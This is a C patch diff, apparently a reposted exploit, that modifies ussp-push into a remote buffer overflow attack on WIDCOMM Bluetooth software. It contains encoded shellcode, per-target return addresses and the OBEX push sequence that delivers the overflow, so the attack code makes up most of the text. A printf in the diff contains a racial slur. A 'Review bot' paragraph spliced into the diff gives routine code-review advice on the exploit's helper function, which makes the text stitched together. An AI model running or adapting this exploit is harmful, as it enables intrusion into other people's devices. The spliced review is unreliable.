WIDCOMM Bluetooth Software < 3.0 Remote Buffer Overflow Exploit
=============================================================== WIDCOMM Bluetooth Software < 3.0 Remote Buffer Overflow Exploit =============================================================== --- ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400 +++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500 @@ -1,4 +1,10 @@ /* + http://www.digitalmunition.com + Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. + http://www.pentest.co.uk/documents/ptl-2004-03.html + +*/ +/* * UNrooted.net example code * * Most of these functions are just rips from the Affix Bluetooth project OBEX @@ -62,7 +68,10 @@ #include "obex_socket.h" -#define UPUSH_APPNAME "ussp-push v0.4" +#include <bluetooth/hci.h> +#include <bluetooth/hci_lib.h> + +#define UPUSH_APPNAME "BluePIMped v0.1" #define BT_SERVICE "OBEX" #define OBEX_PUSH 5 @@ -316,6 +325,9 @@ switch (event) { case OBEX_EV_PROGRESS: printf("Made some progress...\n"); + sleep(3); + printf("Peace nigga...\n"); + exit(0); break; case OBEX_EV_ABORT: @@ -382,9 +394,7 @@ name = remote; name_len = (strlen(name)+1)<<1; - if( (namebuf = g_malloc(name_len)) ) { - OBEX_CharToUnicode(namebuf, name, name_len); - } + namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. buf = easy_readfile(path, &file_size); if(buf == NULL) { @@ -424,6 +434,24 @@ return err; } +static void set_device_name(int ctl, int hdev, char *opt) // Johnh as usual... +{ + int s = hci_open_dev(hdev); + + if (s < 0) { + fprintf(stderr, "Can't open device hci%d: %s (%d)\n", + hdev, strerror(errno), errno); + exit(1); + } + if (opt) { + if (hci_write_local_name(s, opt, 2000) < 0) { + fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n", + hdev, strerror(errno), errno); + exit(1); + } + } + +} /* * That's all there is to it. With it all setup like this all I have to do 
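Review bot: In the `set_device_name` hunk (`@@ -424,6 +434,24 @@`) the descriptor returned by `hci_open_dev(hdev)` is never released: on the success path the function falls off the end with `s` still open, so every call leaks one HCI socket. Add `hci_close_dev(s);` after the `if (opt) { ... }` block (the two `exit(1)` paths release it at process exit, so they need no change). The `ctl` parameter is never read and the `2000` passed to `hci_write_local_name` is an unexplained timeout value; a `(void)ctl;` line or dropping the parameter, plus a named constant or `/* timeout */` comment on the literal, would make the intent clear. The body also relies on `strerror` and `errno`, and this hunk adds only the two `bluetooth/` headers, so confirm that `<string.h>` and `<errno.h>` are already included earlier in the file.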
@@ -434,19 +462,87 @@ int main( int argc, char **argv ) { - if ( argc != 4 ) { - printf("%s\n\n" - "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n" - "\tDEVICE = RFCOMM TTY device file\n" - "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n" - "\tLFILE = Local file path\n" - "\tRFILE = Remote file name\n\n", - UPUSH_APPNAME, argv[0]); +/* + The following may be necessary in hcid.conf to prevent the pairing prompts. + + # Authentication and Encryption (Security Mode 3) + auth disable; + encrypt disable; +*/ + + struct + { + char *os; + u_long ret; + } + targets[] = + { + { "[ XP Pro SP0 - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e }, + { "[ XP Pro SP0 - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e }, + { "[ XP Pro SP0 - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e }, + { "[ XP Pro SP1a - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e }, + { "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e }, + { "[ Crash ]", 0x41424344 }, + }, v; + + if ( argc != 3 ) { + printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET = Target number\n",UPUSH_APPNAME,argv[0]); + printf("Types:\n"); + int i; + for(i = 0; i < sizeof(targets)/sizeof(v); i++) + printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os); + return( -1 ); } - printf( "pushing file %s\n", argv[2] ); - if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) { + /* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */ + /* Size=224 Encoder=ShikataGaNai http://metasploit.com */ + /* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ + /* this still crashes the BTStackServer.exe... 
but oh well */ + unsigned char scode[] = + "\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7" + "\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f" + "\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03" + "\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16" + "\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7" + "\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4" + "\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04" + "\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54" + "\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f" + "\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5" + "\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c" + "\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73" + "\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03" + "\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a"; + + set_device_name(0,0,scode); + //printf("RENAME DONE: SET NEW NAME TO %s\n",scode); + //printf( "pushing file.\n"); + + char buf[3000]; + memset(buf,'\0',sizeof(buf)); + memset(buf,'Z',3); // Sometimes u need 3 z's + + int type = atoi(argv[2]); + if(type) + { + printf("[-] Selected target:\n"); + printf(" %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os); + } + + int x; + for(x=0; x<=122; x=x+1) + { + memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4); + } + // Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode + if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) { + printf( "error\n" ); + return( -1 ); + } + printf("\nsleeping 3 seconds before triggering the shellcode\n"); + sleep(3); + if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) { printf( "error\n" ); return( -1 ); } # 0day.today [2024-11-16] #